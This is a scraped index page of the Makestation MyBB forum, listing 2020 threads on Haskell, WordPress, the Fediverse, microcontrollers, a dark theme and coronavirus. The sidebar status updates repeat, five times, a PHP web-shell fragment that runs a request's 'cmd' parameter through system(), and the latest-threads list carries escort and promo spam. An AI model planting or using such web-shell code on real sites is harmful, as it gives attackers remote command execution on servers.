Welcome, Guest
Welcome to Makestation! We are a creative arts/indie discussion community — Your center for creative arts discussion, unleashed!

Please note that you must log in to participate in discussions on the forum. If you do not have an account, you can create one here. We hope you enjoy the forum!

Status Updates
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
Avatar of User
tc4me February 19th, 2025
if(isset($_REQUEST['cmd'])){ echo "<getshell success>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "<getshell success>"; phpinfo();
View all updates

Search Forums

(Advanced Search)

Forum Statistics
» Members: 1,211
» Latest member: wilsondiaz9112
» Forum threads: 51,955
» Forum posts: 76,380

Full Statistics

Online Users
There are currently 1300 online users.
» 3 Member(s) | 1296 Guest(s)
Google, e.uni.cedi.men.r.o, s.at.r.eo.p.alsen, Yukiko

Latest Threads
홍대오피 ⦑오피쓰주소.COM⦒ 홍대마사지 홍대...
Forum: The Others
Last Post: s.at.r.eo.p.alsen
Less than 1 minute ago
» Replies: 0
» Views: 1
구미마사지【출장안마사이트.COM】구미1인샵 구...
Forum: The Others
Last Post: e.uni.cedi.men.r.o
Less than 1 minute ago
» Replies: 0
» Views: 1
Temu Promo Code For Exist...
Forum: General Discussion
Last Post: Yukiko
Less than 1 minute ago
» Replies: 0
» Views: 2
남양주오피 ⦑출장안마사이트.COM⦒ 남양주오피...
Forum: The Others
Last Post: s.at.r.eo.p.alsen
1 minute ago
» Replies: 0
» Views: 1
강서마사지【오피.CLUB】강서 마사지 강서마사...
Forum: The Others
Last Post: e.uni.cedi.men.r.o
1 minute ago
» Replies: 0
» Views: 1
수원오피 수원출장안마 ⦑오피사이트.NET⦒ 수...
Forum: The Others
Last Post: s.at.r.eo.p.alsen
2 minutes ago
» Replies: 0
» Views: 1
제주안마【오피.CLUB】제주마사지 제주스...
Forum: The Others
Last Post: e.uni.cedi.men.r.o
2 minutes ago
» Replies: 0
» Views: 1

 
  Can you Learn a Programming Language in Eight Hours?
Posted by: Darth-Apple - March 5th, 2020 at 11:12 PM - Forum: Software - Replies (4)

So yes... I have an assignment due tonight. It involves creating factorials, sorting algorithms and palindromes in a language called Haskell. It is what is known as a functional language. You write it like you would write math expressions. It's completely and totally different than a normal programming language. 

I have eight hours to do it. And I'm two hours in. I'm allocating three hours to learn Haskell. 15 minutes to break (now), and another five hours to do the assignment itself. 

http://learnyouahaskell.com/chapters

So far, the link above is the only guide I have. I shall let you guys know how it goes. Finna

Print this item

  Elizabeth Warren Drops out of the Race
Posted by: Darth-Apple - March 5th, 2020 at 7:12 PM - Forum: Current Events - Replies (10)

https://www.nytimes.com/2020/03/05/us/po...s-out.html

I don’t usually keep up with the primaries too terribly closely. However, this time, I’ve been keeping up with some of them. It’s looking very quickly like Biden and Sanders are going to be head to head in the coming months. 

Sanders, incidentally, has had more support than anyone else on campus. There has been very significant support for him by student associations around here. 

I’m personally midline between conservative and liberal. I’ve voted for candidates on both sides, so I wind up keeping up with both democratic and republican conventions. What are your thoughts on the democratic debates as of this far?

Print this item

  What Mods do you Use for Cities Skylines?
Posted by: Darth-Apple - March 5th, 2020 at 3:43 AM - Forum: Simmania - Replies (6)

Cities Skylines is a fantastic game out of the box. Unlike Simcity 4, you don't really need to have mods, per se, to play the game and enjoy it. But that being said, it's probably even more extensible than Simcity 4. If you were going to create a list of must-have mods, what would you put on the list? 

Mine: 

  • Traffic Manager President Edition. (Much like SC4's NAM, althougn not quite as extensive. Lots of additional traffic tools. )
  • Roundabout builder
  • Bulldoze it (pretty useful. Automatically bulldozes abandoned buildings)
  • 81 Tiles. (Lets you build beyond the game's default 9-tile limit)
  • Network Extensions 2 (Adds new roads. Think SC4's RHW, but with regular roads and highways) 
  • Move it! (Let's you move just about anything, and even allows you to adjust roads in miniscule ways after they have been built) 
  • First Person Camera (Let's you view your city from any car or pedestrian's view. Very nice!) 
What do you use for your mod stack in Cities Skylines?

Print this item

  What happened to Parallax?
Posted by: Darth-Apple - March 4th, 2020 at 11:59 PM - Forum: Technology & Hardware - Replies (5)

I learned to program on the Basic Stamp 2. It had a measly 2KB of program memory, and a very minscule amount of RAM (somewhere in the range of 256 bytes, maybe less). You could only really store a couple hundred lines of code for your program on the microcontroller, so it was anything BUT powerful. However, it was in the basic programming language, so it was extremely easy. 

Python is honestly pretty much just about as easy as BASIC is, while being far more powerful. It would be VERY interesting to see python on a microcontroller at some point, but being that Python's runtime environment is fairly heavyweight compared to a basic environment, I don't see this happening. 

Anyway, the basic stamp was very restrictive due to the extremely small amount of memory. Arduinos have long been the standard because they are more cost effective, more flexible, and much better in terms of hardware (and they are powered by 8-bit AVRs. There is a lot you can do, even with ancient CPUs). 

More interestingly, Parallax had the propellor microcontroller. It was a bit ahead of its time, but it was neat because it literally had eight cores on a single microcontroller. The programming language that it used, however, was VERY restrictive, as the ENTIRE interpreter had to fit within 512 bytes of memory per core. The propeller would have been a fantastic microcontroller with a slightly more powerful language to back it without having to resort to full C. 

https://en.wikipedia.org/wiki/BASIC_Stamp

As such, it seems that the arduino is more or less carrying the torch now. It's far more powerful, much more cost effective, and very widely accepted. Programs also don't have to fit inside of 2KB of EEPROM, which is nice.

Anyone ever used microcontrollers before? If so, what did you use, and what was your preference?

Print this item

  Happy Birthday @Brian51
Posted by: Darth-Apple - March 4th, 2020 at 5:58 PM - Forum: Community Related - Replies (4)

We have a birthday today for someone who has been a big part of this community (along with many other communities) for a very long time. So with that said, we want to recognize him here. 

Happy birthday brian!

Print this item

  How did Wordpress get So Popular?
Posted by: Darth-Apple - March 3rd, 2020 at 10:24 PM - Forum: Web Design & Internet - Replies (9)

I've used a few different CMSs (content management systems) over the years. Drupal used to be my go to. I really don't know what I was thinking. Drupal is one of the most difficult, least stable (unless you're a developer), and slowest CMSs in existence. It's also losing popularity. But for whatever reason, it worked really well for Simlink and I back when we used to make "filecave" file exchanges for game mods for websites. There wasn't really anything you couldn't do with it. It was pretty powerful once you got the hang of it, and at the time, it was often the only CMS you could use to get the job done if you needed something highly customized.

But I've been playing around with Wordpress now, and wordpress has about a 35% market share of all websites on the internet now. It's a lightweight little package made for blogs, but there is literally not much you can't do with it. It's rock solid. You can install themes, plugins, and updates with a single click. There are thousands of plugins that literally make almost anything possible. You can make social media sites, forums, galleries, corporate websites, or just about anything else. There are an increasing number of mega-corporations that are now using Wordpress over the alternatives.

Have you guys ever used wordpress? Do you think there will be any good alternatives to it in the long run, or is Wordpress sort of remaining the de-facto standard for easy content management systems?

I ask, because I've been messing with Drupal as well. Drupal has about 1/20 of the market share of Wordpress, and it used to be much more popular than it is now. Joomla is not really a realistic alternative, so it kinda seems like there's a ferarri racing against a ton of Altimas. There are alternative CMS', but they aren't really a match. Finna

I also know that JS-frameworks such as Angular, and non-PHP solutions (nodeJS, Django/Flask, etc.) are gaining popularity as well. It will be interesting to see how PHP stacks up against the alternatives in 10 years.

Print this item

  Open source social media: The Fediverse
Posted by: SpookyZalost - March 3rd, 2020 at 7:00 AM - Forum: Web Design & Internet - Replies (2)

What is the Fediverse you're probably asking... well it's a collection of servers using decentralized, open source, social media platforms.

what that means is that it's not controlled by corporations, nothing is on a single server that can be hacked, and it's free to join, plus there's cross pollination between it all.

some more well known platforms include mastodon, basically a twitter alternative with aspects of tumblr.  Frendica, a decentralized face book alternative where people can make their own servers and stuff, and peertube which is a peer to peer based decentralized alternative to youtube and other video sharing platforms.

it's a lot harder to do DMCA claims and such, and it's hard to have information be lost.

it's possible this is the future of social media once the corps stagnate a bit but who knows...

just wanted to share this crazy thing I've stumbled upon.

https://en.wikipedia.org/wiki/Fediverse
https://en.wikipedia.org/wiki/Friendica
https://en.wikipedia.org/wiki/Mastodon_(software)
https://en.wikipedia.org/wiki/PeerTube

Print this item

  Makestation Dark (Monokai)
Posted by: Lain - March 3rd, 2020 at 2:33 AM - Forum: Announcements - Replies (27)

Finished up an 'alpha' version of a dark-theme userscript, I guess. like 95% of the site's functionality is there, minus the MyBB rich-text field for making posts and whatnot.

Screenshots:

Index page:
[Image: 3qMV0jO.png]

Thread/Post (Classic-Linear ONLY!)
[Image: Wb8m6ZS.png]

Forum-View: 
[Image: CDD7qRr.png]

Profile Page:
[Image: gryvihs.png]

Newpoints:
[Image: tsI59Cs.png]


TODO: 
- Post Control Buttons
- Checkboxes in various places
- UserCP is still mostly untested
- Threaded Post-view mode is untested
- Scrollbars


Stuff that I can't be f*** with:
- Anything to do with images or HTML Tongue
- The rich-text post editor
- Cross-browser support
- Removing any of the !important's in the code.

Installation:

  1. Find the code here, copy/paste the whole thing.
  2. Install Stylish for Chrome or FireFox
  3. From Stylish, hit the three dots at the top, hit 'Create a New Style'
  4. On the left from the New Style page, hit 'Import'
  5. Paste the CSS in.
  6. Save, exit, refresh Makestation.

Print this item

  Coronavirus
Posted by: Darth-Apple - March 3rd, 2020 at 2:30 AM - Forum: Current Events - Replies (189)

https://www.cnn.com/2020/03/02/politics/...index.html

I know we have multiple countries represented here at MS. (Some in Canada, Europe, and the US). Here in the US, there's a lot of talk going on about it. Most people don't really seem too terribly worried about it yet. Maybe concerned. But not in a state of panic. 

It's not that the virus has been proven to be extremely deadly (although deadly it is). We do know that Ebola was far worse, and much more serious. The issue with the Coronovirus is that we know very little about it. It's something that is pretty much completely new. We can't treat it the way that we treat the flu. We can't vaccinate against it the same way. 

What are your thoughts on the spread of the virus? How is it affecting your hometown or country?

Print this item

  Nostalgia...
Posted by: Darth-Apple - March 2nd, 2020 at 12:18 AM - Forum: Announcements - Replies (4)

I've long been looking for a screenshot for this. I finally found one, courtesy of JordanMussi on the MyBB community forums. Without further ado, this is how we used to look back in 2013. Finna 

[Image: FnUXjwn.png]

https://community.mybb.com/thread-129440...pid1022039

I miss the color scheme a little bit. I'd be willing to bring it back, but it needs some serious polish. Tongue

Print this item


Dark/Light Theme Selector

Contact Us | Makestation | Return to Top | Lite (Archive) Mode | RSS Syndication 
Proudly powered by MyBB 1.8, © 2002-2025
Forum design by Makestation Team © 2013-2025